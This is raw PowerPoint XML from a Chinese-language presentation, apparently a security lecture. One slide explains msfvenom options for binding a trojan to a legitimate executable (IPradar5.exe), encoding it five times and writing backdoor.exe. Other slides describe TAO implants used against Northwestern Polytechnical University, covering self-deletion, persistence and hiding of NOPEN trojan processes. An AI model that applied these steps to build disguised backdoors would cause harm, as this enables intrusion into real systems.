              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-x IPradar5.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>此步意为将木马捆绑在指定的可执行程序模版上，此处为IPradar5.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-i 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>此处意为使用刚才设定的编码方式对目标进行5次编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-f exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>此步意为指定MSF编码器输出格式为exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-o /root/Desktop/backdoor.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>此步意为指定处理完毕后的文件输出路径</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TAO在对西北工业大学的网络攻击武器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587928" y="2349234"/>
            <a:ext cx="1382594" cy="1348670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 515251 w 1306423"/>
              <a:gd name="connsiteY0" fmla="*/ 286600 h 1274368"/>
              <a:gd name="connsiteX1" fmla="*/ 249440 w 1306423"/>
              <a:gd name="connsiteY1" fmla="*/ 250736 h 1274368"/>
              <a:gd name="connsiteX2" fmla="*/ 285331 w 1306423"/>
              <a:gd name="connsiteY2" fmla="*/ 516394 h 1274368"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1306423"/>
              <a:gd name="connsiteY3" fmla="*/ 1274343 h 1274368"/>
              <a:gd name="connsiteX4" fmla="*/ 459600 w 1306423"/>
              <a:gd name="connsiteY4" fmla="*/ 1274368 h 1274368"/>
              <a:gd name="connsiteX5" fmla="*/ 717448 w 1306423"/>
              <a:gd name="connsiteY5" fmla="*/ 718731 h 1274368"/>
              <a:gd name="connsiteX6" fmla="*/ 1306423 w 1306423"/>
              <a:gd name="connsiteY6" fmla="*/ 458597 h 1274368"/>
              <a:gd name="connsiteX7" fmla="*/ 1306423 w 1306423"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 1274368"/>
              <a:gd name="connsiteX8" fmla="*/ 515251 w 1306423"/>
              <a:gd name="connsiteY8" fmla="*/ 286600 h 12743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06423" h="1274368">
                <a:moveTo>
                  <a:pt x="515251" y="286600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="249440" y="250736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285331" y="516394"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="110058" y="739609"/>
                  <a:pt x="14808" y="1005103"/>
                  <a:pt x="0" y="1274343"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="459600" y="1274368"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="476567" y="1071752"/>
                  <a:pt x="562381" y="873747"/>
                  <a:pt x="717448" y="718731"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="880960" y="555155"/>
                  <a:pt x="1092275" y="468464"/>
                  <a:pt x="1306423" y="458597"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1306423" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1025842" y="8559"/>
                  <a:pt x="747623" y="104203"/>
                  <a:pt x="515251" y="286600"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="22364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22" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6045038" y="3772456"/>
            <a:ext cx="1397970" cy="1432578"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1018438 w 1320952"/>
              <a:gd name="connsiteY0" fmla="*/ 856195 h 1353654"/>
              <a:gd name="connsiteX1" fmla="*/ 1320952 w 1320952"/>
              <a:gd name="connsiteY1" fmla="*/ 37 h 1353654"/>
              <a:gd name="connsiteX2" fmla="*/ 862457 w 1320952"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1353654"/>
              <a:gd name="connsiteX3" fmla="*/ 601370 w 1320952"/>
              <a:gd name="connsiteY3" fmla="*/ 634682 h 1353654"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1320952"/>
              <a:gd name="connsiteY4" fmla="*/ 895083 h 1353654"/>
              <a:gd name="connsiteX5" fmla="*/ 63 w 1320952"/>
              <a:gd name="connsiteY5" fmla="*/ 1353654 h 1353654"/>
              <a:gd name="connsiteX6" fmla="*/ 822756 w 1320952"/>
              <a:gd name="connsiteY6" fmla="*/ 1051712 h 1353654"/>
              <a:gd name="connsiteX7" fmla="*/ 1049006 w 1320952"/>
              <a:gd name="connsiteY7" fmla="*/ 1082319 h 1353654"/>
              <a:gd name="connsiteX8" fmla="*/ 1018438 w 1320952"/>
              <a:gd name="connsiteY8" fmla="*/ 856195 h 13536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20952" h="1353654">
                <a:moveTo>
                  <a:pt x="1018438" y="856195"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1221104" y="607593"/>
                  <a:pt x="1321942" y="303657"/>
                  <a:pt x="1320952" y="37"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="862457" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="863485" y="229577"/>
                  <a:pt x="776554" y="459537"/>
                  <a:pt x="601370" y="634682"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="434695" y="801395"/>
                  <a:pt x="218427" y="888047"/>
                  <a:pt x="0" y="895083"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63" y="1353654"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="292506" y="1347432"/>
                  <a:pt x="583272" y="1246860"/>
                  <a:pt x="822756" y="1051712"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1049006" y="1082319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1018438" y="856195"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="22364B"/>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19" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4585605" y="3782537"/>
            <a:ext cx="1384919" cy="1432256"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 458571 w 1308620"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1353349"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 1308620"/>
              <a:gd name="connsiteY1" fmla="*/ 12 h 1353349"/>
              <a:gd name="connsiteX2" fmla="*/ 292036 w 1308620"/>
              <a:gd name="connsiteY2" fmla="*/ 842683 h 1353349"/>
              <a:gd name="connsiteX3" fmla="*/ 261429 w 1308620"/>
              <a:gd name="connsiteY3" fmla="*/ 1069606 h 1353349"/>
              <a:gd name="connsiteX4" fmla="*/ 483704 w 1308620"/>
              <a:gd name="connsiteY4" fmla="*/ 1039545 h 1353349"/>
              <a:gd name="connsiteX5" fmla="*/ 1308620 w 1308620"/>
              <a:gd name="connsiteY5" fmla="*/ 1353350 h 1353349"/>
              <a:gd name="connsiteX6" fmla="*/ 1308595 w 1308620"/>
              <a:gd name="connsiteY6" fmla="*/ 894803 h 1353349"/>
              <a:gd name="connsiteX7" fmla="*/ 719620 w 1308620"/>
              <a:gd name="connsiteY7" fmla="*/ 634669 h 1353349"/>
              <a:gd name="connsiteX8" fmla="*/ 458571 w 1308620"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 13533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08620" h="1353349">
                <a:moveTo>
                  <a:pt x="458571" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="12"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-952" y="298221"/>
                  <a:pt x="96545" y="596569"/>
                  <a:pt x="292036" y="842683"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="261429" y="1069606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483704" y="1039545"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="722591" y="1239812"/>
                  <a:pt x="1014310" y="1344371"/>
                  <a:pt x="1308620" y="1353350"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1308595" y="894803"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1094435" y="884897"/>
                  <a:pt x="883119" y="798182"/>
                  <a:pt x="719620" y="634669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="544423" y="459498"/>
                  <a:pt x="457466" y="229565"/>
                  <a:pt x="458571" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="DAB96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aseline="-25000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6056442" y="2352940"/>
            <a:ext cx="1395685" cy="1348966"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1057123 w 1318793"/>
              <a:gd name="connsiteY0" fmla="*/ 240017 h 1274648"/>
              <a:gd name="connsiteX1" fmla="*/ 789698 w 1318793"/>
              <a:gd name="connsiteY1" fmla="*/ 276110 h 1274648"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1318793"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1274648"/>
              <a:gd name="connsiteX3" fmla="*/ 25 w 1318793"/>
              <a:gd name="connsiteY3" fmla="*/ 458533 h 1274648"/>
              <a:gd name="connsiteX4" fmla="*/ 601395 w 1318793"/>
              <a:gd name="connsiteY4" fmla="*/ 719035 h 1274648"/>
              <a:gd name="connsiteX5" fmla="*/ 859256 w 1318793"/>
              <a:gd name="connsiteY5" fmla="*/ 1274648 h 1274648"/>
              <a:gd name="connsiteX6" fmla="*/ 1318793 w 1318793"/>
              <a:gd name="connsiteY6" fmla="*/ 1274622 h 1274648"/>
              <a:gd name="connsiteX7" fmla="*/ 1021715 w 1318793"/>
              <a:gd name="connsiteY7" fmla="*/ 501916 h 1274648"/>
              <a:gd name="connsiteX8" fmla="*/ 1057123 w 1318793"/>
              <a:gd name="connsiteY8" fmla="*/ 240017 h 12746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8793" h="1274648">
                <a:moveTo>
                  <a:pt x="1057123" y="240017"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="789698" y="276110"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="556729" y="98069"/>
                  <a:pt x="279234" y="6007"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="25" y="458533"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="218427" y="465620"/>
                  <a:pt x="434708" y="552310"/>
                  <a:pt x="601395" y="719035"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="756450" y="874052"/>
                  <a:pt x="842276" y="1072019"/>
                  <a:pt x="859256" y="1274648"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1318793" y="1274622"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1303655" y="999464"/>
                  <a:pt x="1204531" y="728040"/>
                  <a:pt x="1021715" y="501916"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1057123" y="240017"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="DAB96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16" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4585605" y="3772456"/>
            <a:ext cx="1384919" cy="1432256"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 458571 w 1308620"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1353349"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 1308620"/>
              <a:gd name="connsiteY1" fmla="*/ 12 h 1353349"/>
              <a:gd name="connsiteX2" fmla="*/ 292036 w 1308620"/>
              <a:gd name="connsiteY2" fmla="*/ 842683 h 1353349"/>
              <a:gd name="connsiteX3" fmla="*/ 261429 w 1308620"/>
              <a:gd name="connsiteY3" fmla="*/ 1069606 h 1353349"/>
              <a:gd name="connsiteX4" fmla="*/ 483704 w 1308620"/>
              <a:gd name="connsiteY4" fmla="*/ 1039545 h 1353349"/>
              <a:gd name="connsiteX5" fmla="*/ 1308620 w 1308620"/>
              <a:gd name="connsiteY5" fmla="*/ 1353350 h 1353349"/>
              <a:gd name="connsiteX6" fmla="*/ 1308595 w 1308620"/>
              <a:gd name="connsiteY6" fmla="*/ 894803 h 1353349"/>
              <a:gd name="connsiteX7" fmla="*/ 719620 w 1308620"/>
              <a:gd name="connsiteY7" fmla="*/ 634669 h 1353349"/>
              <a:gd name="connsiteX8" fmla="*/ 458571 w 1308620"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 135334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08620" h="1353349">
                <a:moveTo>
                  <a:pt x="458571" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="12"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-952" y="298221"/>
                  <a:pt x="96545" y="596569"/>
                  <a:pt x="292036" y="842683"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="261429" y="1069606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483704" y="1039545"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="722591" y="1239812"/>
                  <a:pt x="1014310" y="1344371"/>
                  <a:pt x="1308620" y="1353350"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1308595" y="894803"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1094435" y="884897"/>
                  <a:pt x="883119" y="798182"/>
                  <a:pt x="719620" y="634669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="544423" y="459498"/>
                  <a:pt x="457466" y="229565"/>
                  <a:pt x="458571" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFBA1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18" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6045018" y="2348908"/>
            <a:ext cx="1395685" cy="1348966"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1057123 w 1318793"/>
              <a:gd name="connsiteY0" fmla="*/ 240017 h 1274648"/>
              <a:gd name="connsiteX1" fmla="*/ 789698 w 1318793"/>
              <a:gd name="connsiteY1" fmla="*/ 276110 h 1274648"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1318793"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1274648"/>
              <a:gd name="connsiteX3" fmla="*/ 25 w 1318793"/>
              <a:gd name="connsiteY3" fmla="*/ 458533 h 1274648"/>
              <a:gd name="connsiteX4" fmla="*/ 601395 w 1318793"/>
              <a:gd name="connsiteY4" fmla="*/ 719035 h 1274648"/>
              <a:gd name="connsiteX5" fmla="*/ 859256 w 1318793"/>
              <a:gd name="connsiteY5" fmla="*/ 1274648 h 1274648"/>
              <a:gd name="connsiteX6" fmla="*/ 1318793 w 1318793"/>
              <a:gd name="connsiteY6" fmla="*/ 1274622 h 1274648"/>
              <a:gd name="connsiteX7" fmla="*/ 1021715 w 1318793"/>
              <a:gd name="connsiteY7" fmla="*/ 501916 h 1274648"/>
              <a:gd name="connsiteX8" fmla="*/ 1057123 w 1318793"/>
              <a:gd name="connsiteY8" fmla="*/ 240017 h 12746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8793" h="1274648">
                <a:moveTo>
                  <a:pt x="1057123" y="240017"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="789698" y="276110"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="556729" y="98069"/>
                  <a:pt x="279234" y="6007"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="25" y="458533"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="218427" y="465620"/>
                  <a:pt x="434708" y="552310"/>
                  <a:pt x="601395" y="719035"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="756450" y="874052"/>
                  <a:pt x="842276" y="1072019"/>
                  <a:pt x="859256" y="1274648"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1318793" y="1274622"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1303655" y="999464"/>
                  <a:pt x="1204531" y="728040"/>
                  <a:pt x="1021715" y="501916"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1057123" y="240017"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFBA11"/>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23" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6667220" y="2782178"/>
            <a:ext cx="360680" cy="262890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1695"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5043355" y="4599184"/>
            <a:ext cx="360680" cy="262890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1695"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078881" y="3548285"/>
            <a:ext cx="1911934" cy="714811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1585"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="80010" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>INDUSTRY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1585"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="80010" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1695"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="80010" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PAIN POINTS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7821930" y="1069340"/>
            <a:ext cx="4001770" cy="3745865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>④“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>狡诈异端犯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>”：此武器是一款轻量级的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>后门植入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>工具，运行后即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>自删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>，具备权限提升能力，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>持久驻留于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>目标设备上并可随系统启动。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>⑤“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>坚忍外科医生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>”：可持久化运行于目标设备上，根据指令对目标设备上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>指定文件、目录、进程等进行隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>。TAO主要使用该武器隐藏NOPEN木马的文件和进程，避免其被监控发现。技术分析发现，TAO在对西北工业大学的网络攻击中，累计使用了该武器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>12个不同版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6264275" y="1707515"/>
            <a:ext cx="1434465" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>持久化控制类武器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3631565" y="4027805"/>
            <a:ext cx="1198880" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>嗅探窃密类武器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1146810"/>
            <a:ext cx="3823335" cy="4964430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
